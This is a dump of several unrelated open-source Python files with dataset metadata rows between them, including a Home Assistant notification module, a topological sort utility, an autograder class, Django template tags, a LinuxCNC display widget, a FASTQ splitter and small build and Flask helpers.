hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
hass.services.async_register(
DOMAIN, SERVICE_CREATE, create_service, SCHEMA_SERVICE_CREATE
)
hass.services.async_register(
DOMAIN, SERVICE_DISMISS, dismiss_service, SCHEMA_SERVICE_DISMISS
)
hass.services.async_register(
DOMAIN, SERVICE_MARK_READ, mark_read_service, SCHEMA_SERVICE_MARK_READ
)
hass.components.websocket_api.async_register_command(
WS_TYPE_GET_NOTIFICATIONS, websocket_get_notifications, SCHEMA_WS_GET
)
return True
@callback
def websocket_get_notifications(
hass: HomeAssistant, connection: websocket_api.ActiveConnection, msg
):
"""Return a list of persistent_notifications."""
connection.send_message(
websocket_api.result_message(
msg["id"],
[
{
key: data[key]
for key in (
ATTR_NOTIFICATION_ID,
ATTR_MESSAGE,
ATTR_STATUS,
ATTR_TITLE,
ATTR_CREATED_AT,
)
}
for data in hass.data[DOMAIN]["notifications"].values()
],
)
)
|
apache-2.0
| 7,887,698,443,924,102,000
| 30
| 86
| 0.639401
| false
| 4.037209
| false
| false
| false
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/lib/galaxy/util/topsort.py
|
1
|
7495
|
"""
Topological sort.
From Tim Peters, see:
http://mail.python.org/pipermail/python-list/1999-July/006660.html
topsort takes a list of pairs, where each pair (x, y) is taken to
mean that x <= y wrt some abstract partial ordering. The return
value is a list, representing a total ordering that respects all
the input constraints.
E.g.,
topsort( [(1,2), (3,3)] )
Valid topological sorts would be any of (but nothing other than)
[3, 1, 2]
[1, 3, 2]
[1, 2, 3]
... however this variant ensures that 'key' order (first element of
tuple) is preserved so the following will be result returned:
[1, 3, 2]
because those are the permutations of the input elements that
respect the "1 precedes 2" and "3 precedes 3" input constraints.
Note that a constraint of the form (x, x) is really just a trick
to make sure x appears *somewhere* in the output list.
If there's a cycle in the constraints, say
topsort( [(1,2), (2,1)] )
then CycleError is raised, and the exception object supports
many methods to help analyze and break the cycles. This requires
a good deal more code than topsort itself!
"""
from galaxy.util.odict import odict as OrderedDict
from exceptions import Exception
class CycleError(Exception):
def __init__(self, sofar, numpreds, succs):
Exception.__init__(self, "cycle in constraints",
sofar, numpreds, succs)
self.preds = None
# return as much of the total ordering as topsort was able to
# find before it hit a cycle
def get_partial(self):
return self[1]
# return remaining elt -> count of predecessors map
def get_pred_counts(self):
return self[2]
# return remaining elt -> list of successors map
def get_succs(self):
return self[3]
# return remaining elements (== those that don't appear in
# get_partial())
def get_elements(self):
return self.get_pred_counts().keys()
# Return a list of pairs representing the full state of what's
# remaining (if you pass this list back to topsort, it will raise
# CycleError again, and if you invoke get_pairlist on *that*
# exception object, the result will be isomorphic to *this*
# invocation of get_pairlist).
# The idea is that you can use pick_a_cycle to find a cycle,
# through some means or another pick an (x,y) pair in the cycle
# you no longer want to respect, then remove that pair from the
# output of get_pairlist and try topsort again.
def get_pairlist(self):
succs = self.get_succs()
answer = []
for x in self.get_elements():
if succs.has_key(x):
for y in succs[x]:
answer.append( (x, y) )
else:
# make sure x appears in topsort's output!
answer.append( (x, x) )
return answer
# return remaining elt -> list of predecessors map
def get_preds(self):
if self.preds is not None:
return self.preds
self.preds = preds = OrderedDict()
remaining_elts = self.get_elements()
for x in remaining_elts:
preds[x] = []
succs = self.get_succs()
for x in remaining_elts:
if succs.has_key(x):
for y in succs[x]:
preds[y].append(x)
if __debug__:
for x in remaining_elts:
assert len(preds[x]) > 0
return preds
# return a cycle [x, ..., x] at random
def pick_a_cycle(self):
remaining_elts = self.get_elements()
# We know that everything in remaining_elts has a predecessor,
# but don't know that everything in it has a successor. So
# crawling forward over succs may hit a dead end. Instead we
# crawl backward over the preds until we hit a duplicate, then
# reverse the path.
preds = self.get_preds()
from random import choice
x = choice(remaining_elts)
answer = []
index = OrderedDict()
in_answer = index.has_key
while not in_answer(x):
index[x] = len(answer) # index of x in answer
answer.append(x)
x = choice(preds[x])
answer.append(x)
answer = answer[index[x]:]
answer.reverse()
return answer
def topsort(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
# suck up everything without a predecessor
answer = filter(lambda x, numpreds=numpreds: numpreds[x] == 0,
numpreds.keys())
# for everything in answer, knock down the pred count on
# its successors; note that answer grows *in* the loop
for x in answer:
assert numpreds[x] == 0
del numpreds[x]
if successors.has_key(x):
for y in successors[x]:
numpreds[y] = numpreds[y] - 1
if numpreds[y] == 0:
answer.append(y)
# following "del" isn't needed; just makes
# CycleError details easier to grasp
del successors[x]
if numpreds:
# everything in numpreds has at least one predecessor ->
# there's a cycle
if __debug__:
for x in numpreds.keys():
assert numpreds[x] > 0
raise CycleError(answer, numpreds, successors)
return answer
def topsort_levels(pairlist):
numpreds = OrderedDict() # elt -> # of predecessors
successors = OrderedDict() # elt -> list of successors
for first, second in pairlist:
# make sure every elt is a key in numpreds
if not numpreds.has_key(first):
numpreds[first] = 0
if not numpreds.has_key(second):
numpreds[second] = 0
# if they're the same, there's no real dependence
if first == second:
continue
# since first < second, second gains a pred ...
numpreds[second] = numpreds[second] + 1
# ... and first gains a succ
if successors.has_key(first):
successors[first].append(second)
else:
successors[first] = [second]
answer = []
while 1:
# Suck up everything without a predecessor.
levparents = [x for x in numpreds.keys() if numpreds[x] == 0]
if not levparents:
break
answer.append( levparents )
for levparent in levparents:
del numpreds[levparent]
if successors.has_key(levparent):
for levparentsucc in successors[levparent]:
numpreds[levparentsucc] -= 1
del successors[levparent]
if numpreds:
        # Everything left in numpreds has at least one predecessor ->
        # there's a cycle.
raise CycleError( answer, numpreds, successors )
return answer
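# Hedged usage sketch (not part of the original module): the pair lists below are
# assumptions used only to illustrate topsort and the CycleError introspection API.
if __name__ == '__main__':
    print topsort([(1, 2), (3, 3), (2, 4)])  # -> [1, 3, 2, 4]
    try:
        topsort([(1, 2), (2, 1)])
    except CycleError, err:
        print "cycle detected:", err.pick_a_cycle()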
|
gpl-3.0
| -1,747,945,830,861,587,700
| 32.311111
| 70
| 0.598799
| false
| 3.816191
| false
| false
| false
|
crscardellino/thesis
|
thesis/scripts/unlabeled_corpora_meta.py
|
1
|
1429
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
from functools import partial
from multiprocessing import Pool
from tabulate import tabulate
from thesis.utils import find
def process_file(ifile, meta, output):
    print('Processing %s' % ifile, file=sys.stderr)
    basename = os.path.basename(ifile)
    ofile = os.path.join(output, basename)
with open(ifile, 'r') as fin, open(ofile, 'w') as fout:
sentence = []
sentences = 0
for line in fin:
line = line.strip().split()
if not line and sentence:
print('META:%s sentence:%05d file:%s words:%03d'
% (meta, sentences, basename, len(sentence)), file=fout)
print(tabulate(sentence, tablefmt='plain'), end='\n\n', file=fout)
sentence = []
sentences += 1
elif line:
sentence.append(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input')
parser.add_argument('output')
parser.add_argument('meta')
parser.add_argument('--pattern', default='*')
parser.add_argument('--workers', type=int, default=12)
args = parser.parse_args()
    with Pool(args.workers) as p:
        # Pass the output directory explicitly so worker processes do not depend on
        # the module-level "args", which only exists when run as a script.
        p.map(partial(process_file, meta=args.meta, output=args.output),
              find(args.input, args.pattern))
|
mit
| -7,308,446,227,549,357,000
| 28.163265
| 84
| 0.604619
| false
| 3.820856
| false
| false
| false
|
maxspad/MGrader
|
autograder/modules/questions/PythonQuestion.py
|
1
|
2436
|
'''
Contains the PythonQuestion class, which is an instructor-facing
question type that implements a grade() function.
All instructor-facing Question modules must implement
a grade() function at module level that returns a Result object.
@author: Max Spadafore
'''
from AbstractQuestion import AbstractQ
table_name = 'grades_python'
f_uname = 'uname'
f_ptspos = 'ptspos'
f_ptsrec = 'ptsrec'
f_timestamp = 'timestamp_unix'
TABLE_CREATE = '''CREATE TABLE {0}
({1} TEXT PRIMARY KEY NOT NULL,
{2} INTEGER NOT NULL,
{3} INTEGER NOT NULL,
{4} INTEGER NOT NULL)'''.format(table_name, f_uname, f_ptspos, f_ptsrec, f_timestamp)
def initialize():
'''import autograder.modules.Database as dbm
db = dbm.DAL(connect=True)
db.createTable(TABLE_CREATE)
db.disconnect()'''
def process_cmd(cmdstr, args):
raise NotImplementedError
def grade(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=None, target=None):
'''
Called by the GSM after dynamic import. Takes its parameters, acts on them if it wishes, and passes them along to the
CPPQuestion class, which handles them. It then calls the CPPQuestion grade() function and returns its Result object.
@return: The Result object representing the result of the question's grading.
'''
question = PythonQ(uname, assigname, tcname, inputs, outputs, insprog, rtimeout, ctimeout, diffcmd, runcmd, makefile=makefile, maketarget=target)
return question.grade()
class PythonQ(AbstractQ):
'''
An instructor-facing Question grading class designed to grade python programs.
Utilizes functions from AbstractQ
@see: AbstractQ
'''
def grade(self):
# move to student dir
self.chdirToStudent()
# Run (AbstractQuestion)
self.openFiles('student')
result = self.runStudentCode()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
self.chdirToInstructor()
self.openFiles('instructor')
self.runInstructorCode()
result = self.compareOutputs()
if result[0] == False:
self.chdirToGraderHome()
return self.failStudent(result)
self.closeFiles()
self.chdirToGraderHome()
return self.passStudent()
def getQType(self):
return 'PythonQuestion'
|
bsd-3-clause
| 555,966,247,296,795,100
| 31.932432
| 149
| 0.688013
| false
| 3.85443
| false
| false
| false
|
siggame/webserver
|
webserver/hermes/templatetags/hermes_tags.py
|
1
|
3396
|
from django import template
from django.template.defaultfilters import stringfilter
from competition.models.game_model import Game
import slumber
import datetime
import logging
import requests
logger = logging.getLogger(__name__)
register = template.Library()
@register.filter
@stringfilter
def iso_to_datetime(value):
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")
except ValueError:
pass
try:
return datetime.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
return ""
@register.assignment_tag
def centered_list(value, center=None, size=None):
if size is None or center is None:
return value
if len(value) == 0:
return value
size = int(size)
start = center - size / 2 - 1
stop = center + size / 2
if start < 0:
stop = size
start = 0
if stop >= len(value):
start = len(value) - size
stop = len(value)
return value[start:stop]
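# Illustrative example (assumption, not from the original module): under Python 2
# integer division, centered_list(range(10), center=5, size=3) computes the slice
# [3:6] and returns [3, 4, 5].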
class CheckEmbargoedNode(template.Node):
def __init__(self, team, variable_name):
self.team = team
self.variable_name = variable_name
def render(self, context):
team = context[self.team]
try:
# Get the last game played
last_game = team.game_set.latest()
# Grab the API url from the last Game that was played
url = last_game.data['api_url']
# Query API
response = slumber.API(url).client.get(name=team.slug)
# Make sure that we only get one client item back.
assert response['meta']['total_count'] == 1
# Get "embargoed" from returned client
if response['objects'][0]['embargoed']:
result = "embargoed"
else:
result = "unembargoed"
except Game.DoesNotExist:
result = "not ready"
except slumber.exceptions.ImproperlyConfigured:
result = "error"
logger.error("Bad arena URL: {}".format(url))
except (TypeError, KeyError), e:
result = "error"
logger.error("Error grabbing game data: {}".format(str(e)))
except slumber.exceptions.HttpClientError:
result = "error"
logger.error("Couldn't connect to arena api ({})".format(url))
except slumber.exceptions.HttpServerError:
result = "error"
logger.error("Arena server error ({})".format(url))
except requests.exceptions.ConnectionError:
result = "error"
logger.error("Connection to arena api timed out ({})".format(url))
except AssertionError:
result = "error"
if response['meta']['total_count'] > 1:
msg = 'Found more than one team with slug "{}" in arena'
else:
msg = 'Found zero teams with slug "{}" in arena'
logger.error(msg.format(team.slug))
context[self.variable_name] = result
return ""
@register.tag
def check_embargoed(parser, token):
try:
tag_name, team, _as, variable = token.split_contents()
except ValueError:
tag_name = token.contents.split()[0]
msg = '{0} should be "{0} <team> as <variable>"'
raise template.TemplateSyntaxError(msg.format(tag_name))
return CheckEmbargoedNode(team, variable)
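# Illustrative template usage (derived from the syntax-error message above):
# {% check_embargoed team as embargo_status %} and then render {{ embargo_status }}.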
|
bsd-3-clause
| -4,488,372,421,264,011,300
| 29.594595
| 78
| 0.5904
| false
| 4.101449
| false
| false
| false
|
ianmcmahon/linuxcnc-mirror
|
lib/python/gladevcp/hal_gremlin.py
|
1
|
9842
|
#!/usr/bin/env python
# vim: sts=4 sw=4 et
# GladeVcp Widgets
#
# Copyright (c) 2010 Pavel Shramov <shramov@mexmat.net>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import gtk, gobject
import linuxcnc
import gremlin
import rs274.glcanon
import gcode
from hal_actions import _EMC_ActionBase
from hal_glib import GStat
class HAL_Gremlin(gremlin.Gremlin, _EMC_ActionBase):
__gtype_name__ = "HAL_Gremlin"
__gproperties__ = {
'view' : ( gobject.TYPE_STRING, 'View type', 'Default view: p, x, y, y2, z, z2',
'p', gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'enable_dro' : ( gobject.TYPE_BOOLEAN, 'Enable DRO', 'Show DRO on graphics',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'metric_units' : ( gobject.TYPE_BOOLEAN, 'Use Metric Units', 'Show DRO in metric or imperial units',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_relative' : ( gobject.TYPE_BOOLEAN, 'Show Relative', 'Show DRO relative to active system or machine origin',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_commanded' : ( gobject.TYPE_BOOLEAN, 'Show Commanded', 'Show commanded or actual position',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_extents_option' : ( gobject.TYPE_BOOLEAN, 'Show Extents', 'Show machine extents',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_limits' : ( gobject.TYPE_BOOLEAN, 'Show limits', 'Show machine limits',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_live_plot' : ( gobject.TYPE_BOOLEAN, 'Show live plot', 'Show machine plot',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_velocity' : ( gobject.TYPE_BOOLEAN, 'Show tool speed', 'Show tool velocity',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_program' : ( gobject.TYPE_BOOLEAN, 'Show program', 'Show program',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_rapids' : ( gobject.TYPE_BOOLEAN, 'Show rapids', 'Show rapid moves',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_tool' : ( gobject.TYPE_BOOLEAN, 'Show tool', 'Show tool',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_dtg' : ( gobject.TYPE_BOOLEAN, 'Show DTG', 'Show Distance To Go',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'show_lathe_radius' : ( gobject.TYPE_BOOLEAN, 'Show Lathe Radius', 'Show X axis in Radius',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'grid_size' : ( gobject.TYPE_FLOAT, 'Grid Size', 'Grid Size',
0, 100, 0, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_joints_mode' : ( gobject.TYPE_BOOLEAN, 'Use joints mode', 'Use joints mode',
False, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
'use_default_controls' : ( gobject.TYPE_BOOLEAN, 'Use Default Mouse Controls', 'Use Default Mouse Controls',
True, gobject.PARAM_READWRITE | gobject.PARAM_CONSTRUCT),
}
__gproperties = __gproperties__
def __init__(self, *a, **kw):
inifile = os.environ.get('INI_FILE_NAME', '/dev/null')
inifile = linuxcnc.ini(inifile)
gremlin.Gremlin.__init__(self, inifile)
self.gstat = GStat()
self.gstat.connect('file-loaded', self.fileloaded)
self.show()
def fileloaded(self,w,f):
try:
self._load(f)
except AttributeError,detail:
#AttributeError: 'NoneType' object has no attribute 'gl_end'
print 'hal_gremlin: continuing after',detail
def do_get_property(self, property):
name = property.name.replace('-', '_')
if name == 'view':
return self.current_view
elif name in self.__gproperties.keys():
return getattr(self, name)
else:
raise AttributeError('unknown property %s' % property.name)
def do_set_property(self, property, value):
name = property.name.replace('-', '_')
if name == 'view':
view = value.lower()
if self.lathe_option:
if view not in ['p','y','y2']:
return False
elif view not in ['p', 'x', 'y', 'z', 'z2']:
return False
self.current_view = view
if self.initialised:
self.set_current_view()
elif name == 'enable_dro':
self.enable_dro = value
elif name == 'metric_units':
self.metric_units = value
elif name in self.__gproperties.keys():
setattr(self, name, value)
else:
raise AttributeError('unknown property %s' % property.name)
self.queue_draw()
return True
# This overrides glcannon.py method so we can change the DRO
def dro_format(self,s,spd,dtg,limit,homed,positions,axisdtg,g5x_offset,g92_offset,tlo_offset):
if not self.enable_dro:
return limit, homed, [''], ['']
if self.metric_units:
format = "% 6s:% 9.3f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.3f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.3f G92 %1s:% 9.3f"
rotformat = "% 5s %1s:% 9.3f"
else:
format = "% 6s:% 9.4f"
if self.show_dtg:
droformat = " " + format + " DTG %1s:% 9.4f"
else:
droformat = " " + format
offsetformat = "% 5s %1s:% 9.4f G92 %1s:% 9.4f"
rotformat = "% 5s %1s:% 9.4f"
diaformat = " " + format
posstrs = []
droposstrs = []
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
posstrs.append(format % (a, positions[i]))
if self.show_dtg:
droposstrs.append(droformat % (a, positions[i], a, axisdtg[i]))
else:
droposstrs.append(droformat % (a, positions[i]))
droposstrs.append("")
for i in range(9):
index = s.g5x_index
if index<7:
label = "G5%d" % (index+3)
else:
label = "G59.%d" % (index-6)
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(offsetformat % (label, a, g5x_offset[i], a, g92_offset[i]))
droposstrs.append(rotformat % (label, 'R', s.rotation_xy))
droposstrs.append("")
for i in range(9):
a = "XYZABCUVW"[i]
if s.axis_mask & (1<<i):
droposstrs.append(rotformat % ("TLO", a, tlo_offset[i]))
        # if it's a lathe, only show radius or diameter as per the property;
# we have to adjust the homing icon to line up:
if self.is_lathe():
if homed[0]:
homed.pop(0)
homed.pop(0)
homed.insert(0,1)
homed.insert(0,0)
posstrs[0] = ""
if self.show_lathe_radius:
posstrs.insert(1, format % ("Rad", positions[0]))
else:
posstrs.insert(1, format % ("Dia", positions[0]*2.0))
droposstrs[0] = ""
if self.show_dtg:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0], "R", axisdtg[0]))
else:
droposstrs.insert(1, droformat % ("Dia", positions[0]*2.0, "D", axisdtg[0]*2.0))
else:
if self.show_lathe_radius:
droposstrs.insert(1, droformat % ("Rad", positions[0]))
else:
droposstrs.insert(1, diaformat % ("Dia", positions[0]*2.0))
if self.show_velocity:
posstrs.append(format % ("Vel", spd))
pos=0
for i in range(9):
if s.axis_mask & (1<<i): pos +=1
            if self.is_lathe():
pos +=1
droposstrs.insert(pos, " " + format % ("Vel", spd))
if self.show_dtg:
posstrs.append(format % ("DTG", dtg))
return limit, homed, posstrs, droposstrs
def realize(self, widget):
gremlin.Gremlin.realize(self, widget)
@rs274.glcanon.with_context
def _load(self, filename):
return self.load(filename)
# TODO fix this so it doesn't print twice and it should probably pop up a dialog
def report_gcode_error(self, result, seq, filename):
error_str = gcode.strerror(result)
print("G-Code error in " + os.path.basename(filename) + "\n" + "Near line "
+ str(seq) + " of\n" + filename + "\n" + error_str + "\n")
|
lgpl-2.1
| 7,631,646,314,919,300,000
| 43.533937
| 121
| 0.536883
| false
| 3.69722
| false
| false
| false
|
chappers/Stan
|
stan/proc/proc_parse.py
|
1
|
1781
|
"""
The :mod:`stan.proc.proc_parse` module is the proc parser for SAS-like language.
"""
import re
import pkgutil
from stan.proc.proc_expr import RESERVED_KEYWORDS, PROC_
import stan.proc_functions as proc_func
from stan.proc.proc_sql import proc_sql
def proc_parse(cstr):
"""proc parse converts procedure statements to python function equivalents
Parameters
----------
    cstr : str
        The procedure statement to convert.
Notes
-----
``data`` and ``output``/``out`` are protected variables.
If you wish to use a DataFrame as an argument, prepend ``dt_`` for the parser to interpret this correctly
"""
# if cstr is in the form "proc sql" we won't pass tokens
if re.match(r"^\s*proc\s*sql", cstr.strip(), re.IGNORECASE):
return proc_sql(cstr.strip())
v_ls = PROC_.parseString(cstr)
sls = []
    prepend = ''
for ls in v_ls[1:]:
if len(ls[1:]) > 1:
sls.append("%s=['%s']" % (ls[0], "','".join(ls[1:])))
else:
if ls[0].startswith('dt_') or ls[0] in ['data']: # hungarian notation if we want to use DataFrame as a variable
sls.append("%s=%s" % (ls[0], ls[1]))
elif ls[0] in ['output', 'out']:
                prepend += '%s=' % ls[1]
else:
sls.append("%s='%s'" % (ls[0], ls[1]))
# try to find v_ls[0] in the `proc_func` namespace...
f_name = v_ls[0].strip().lower()
if f_name in [name for _, name, _ in pkgutil.iter_modules(proc_func.__path__)]: # is there a better way?
func_name = "%s.%s" % (f_name, f_name)
else:
func_name = f_name
    return '%s%s(%s)' % (prepend, func_name, ','.join(sls))  # this statement is a bit dodgy
|
mit
| -3,020,345,216,742,110,000
| 29.706897
| 123
| 0.540707
| false
| 3.36673
| false
| false
| false
|
tdyas/pants
|
tests/python/pants_test/backend/jvm/tasks/jvm_compile/rsc/test_rsc_compile_integration.py
|
1
|
2189
|
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants_test.backend.jvm.tasks.jvm_compile.rsc.rsc_compile_integration_base import (
RscCompileIntegrationBase,
ensure_compile_rsc_execution_strategy,
)
class RscCompileIntegration(RscCompileIntegrationBase):
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/7856")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_basic_binary(self):
self._testproject_compile("mutual", "bin", "A")
@ensure_compile_rsc_execution_strategy(
RscCompileIntegrationBase.rsc_and_zinc,
PANTS_COMPILE_RSC_SCALA_WORKFLOW_OVERRIDE="zinc-only",
)
def test_workflow_override(self):
self._testproject_compile("mutual", "bin", "A", outline_result=False)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_executing_multi_target_binary(self):
pants_run = self.do_command("run", "examples/src/scala/org/pantsbuild/example/hello/exe")
self.assertIn("Hello, Resource World!", pants_run.stdout_data)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8679")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_with_transitive_exported_scala_dep(self):
self.do_command(
"compile",
"testprojects/src/scala/org/pantsbuild/testproject/javadepsonscalatransitive:java-in-different-package",
)
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_java_sources(self):
self.do_command("compile", "testprojects/src/scala/org/pantsbuild/testproject/javasources")
@ensure_compile_rsc_execution_strategy(RscCompileIntegrationBase.rsc_and_zinc)
def test_node_dependencies(self):
self.do_command(
"compile", "contrib/node/examples/src/java/org/pantsbuild/testproject/jsresources"
)
def test_rsc_hermetic_jvm_options(self):
self._test_hermetic_jvm_options(self.rsc_and_zinc)
|
apache-2.0
| -6,702,051,356,664,883,000
| 43.673469
| 116
| 0.727273
| false
| 3.331811
| true
| false
| false
|
Magda-M/general-tools
|
fq.split.py
|
1
|
2084
|
"""
SOURCE: https://gist.github.com/brentp/6625544
split a single fastq file into random, non-overlapping subsets
arguments:
+ fastq file
+ number of splits
+ number of reps
+ paired flag (0 = single-end, 1 = paired-end reads)
e.g.:
python fq.split.py input.fastq 3 4 0
will create 12 new files in 4 sets of 3. Each
set of 3 will contain all of the original records.
"""
import gzip
import random
import sys
from itertools import islice, izip
xopen = lambda fq: gzip.open(fq) if fq.endswith('.gz') else open(fq)
def fqiter(fq, lines_per_read):
with xopen(fq) as fh:
fqclean = (x.strip("\r\n") for x in fh if x.strip())
while True:
rec = [x for x in islice(fqclean, lines_per_read)]
if not rec: raise StopIteration
assert all(rec) and len(rec) == lines_per_read
yield rec
def fqsplit(fq, nchunks, nreps, paired, prefix=None):
if paired:
lines_per_read = 8
else:
lines_per_read = 4
if prefix == None: prefix = fq + ".split"
prefix += "chunk-%i.rep-%i.fq"
fq_size = sum(1 for x in xopen(fq) if len(x.strip("\r\n"))>0)
assert fq_size % lines_per_read == 0
fq_size /= lines_per_read # number of records
print >>sys.stderr, "num reads/read pairs:", fq_size
print >>sys.stderr, "num chunks to split into:", nchunks
if fq_size % nchunks == 0 :
chunk_size = fq_size // nchunks
else:
chunk_size = 1 + (fq_size) // nchunks
print >>sys.stderr, "chunk_size:", chunk_size
for rep in range(1, nreps + 1):
files = [open(prefix % (c, rep), 'w') for c in range(1, nchunks + 1)]
ints = range(fq_size)
random.shuffle(ints)
for i, fqr in izip(ints, fqiter(fq, lines_per_read)):
chunk, chunk_i = divmod(i, chunk_size)
print >>files[chunk], "\n".join(fqr)
[f.close() for f in files]
if __name__ == "__main__":
fq = sys.argv[1]
nchunks = int(sys.argv[2])
nreps = int(sys.argv[3])
paired = bool(int(sys.argv[4]))
    print paired  # 0 = single, 1 = paired end reads
fqsplit(fq, nchunks, nreps, paired)
|
gpl-3.0
| 607,869,430,377,086,200
| 27.561644
| 77
| 0.597409
| false
| 3.143288
| false
| false
| false
|
goniz/buildscript
|
build_system/source.py
|
1
|
2177
|
#!/usr/bin/python2
from build_exceptions import BuildError
import os
import re
class File(object):
def __init__(self, path):
self.path = path
def is_newer(self, other):
if os.path.exists(other) is False:
return True
if os.path.exists(self.path) is False:
raise BuildError('SourceFile.path does not exists??')
obj = os.stat(other).st_ctime
me = os.stat(self.path).st_ctime
if me > obj:
return True
return False
@property
def extension(self):
regex = '\.(\w+)$'
return re.findall(regex, self.path)[0]
@property
def filename(self):
return os.path.basename(self.path)
def __str__(self):
return self.filename
def __repr__(self):
return str(self)
class Directory(object):
def __init__(self, path, exts=None):
self.path = path
        # Normalise exts: the default None means "no extensions yet".
        if exts is None:
            self.extensions = []
        elif isinstance(exts, str):
            self.extensions = [exts]
        elif isinstance(exts, list):
            self.extensions = exts
        else:
            raise TypeError('exts should be a list of strings! got %s' % (exts, ))
def add_extension(self, ext):
if not ext in self.extensions:
self.extensions.append(ext)
def generate_regex(self):
return '\.(%s)$' % ('|'.join(self.extensions), )
def discover(self, output=File):
regex = self.generate_regex()
files = os.listdir(self.path)
files = map(lambda x: os.path.join(self.path, x), files)
files = filter(lambda x: re.findall(regex, x), files)
return map(output, files)
class SourceFile(File):
@property
def objectfile(self):
return self.filename.replace(self.extension, 'o')
@property
def language(self):
ext = self.extension
if 'c' == ext:
return 'c'
elif 'py' == ext:
return 'python'
elif 'cpp' == ext:
return 'cpp'
else:
return 'Unknown'
class SourceDirectory(Directory):
def discover(self, output=SourceFile):
        return super(SourceDirectory, self).discover(output)
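# Hedged usage sketch (not part of the original module): discover C/C++ sources in a
# hypothetical "src" directory and show the derived object-file names.
if __name__ == '__main__':
    for src in SourceDirectory('src', exts=['c', 'cpp']).discover():
        print '%s -> %s (%s)' % (src, src.objectfile, src.language)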
|
mit
| -8,906,877,451,912,974,000
| 24.623529
| 82
| 0.569132
| false
| 3.859929
| false
| false
| false
|
dkkline/CanSat14-15
|
presenter/__init__.py
|
1
|
1230
|
"""
Contains a Flask-based webserver in charge of presenting a website and
collected data to users connected via a webbrowser.
"""
__version__ = (0, 0, 1)
from .app import app
from .config import DevelopmentConfig, ProductionConfig
from flask_debugtoolbar import DebugToolbarExtension
def run_dev():
"""
Runs the presenter module in developer mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
app.config.from_object(DevelopmentConfig)
toolbar = DebugToolbarExtension(app)
app.run(use_reloader=False, host=DevelopmentConfig.HOST,
port=DevelopmentConfig.PORT)
def run_prod():
"""
Runs the presenter module in production mode.
"""
# pylint: disable=unused-variable
from . import views # noqa
# pylint: enable=unused-variable
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from presenter import app
app.config.from_object(ProductionConfig)
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(ProductionConfig.PORT)
IOLoop.instance().start()
if __name__ == '__main__':
    # Run the development server when this package is executed directly.
    run_dev()
|
mit
| -3,177,141,107,318,055,400
| 22.653846
| 70
| 0.701626
| false
| 4.072848
| true
| false
| false
|
alexef/gobject-introspection
|
giscanner/girwriter.py
|
1
|
23830
|
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2008 Johan Dahlin
# Copyright (C) 2008, 2009 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
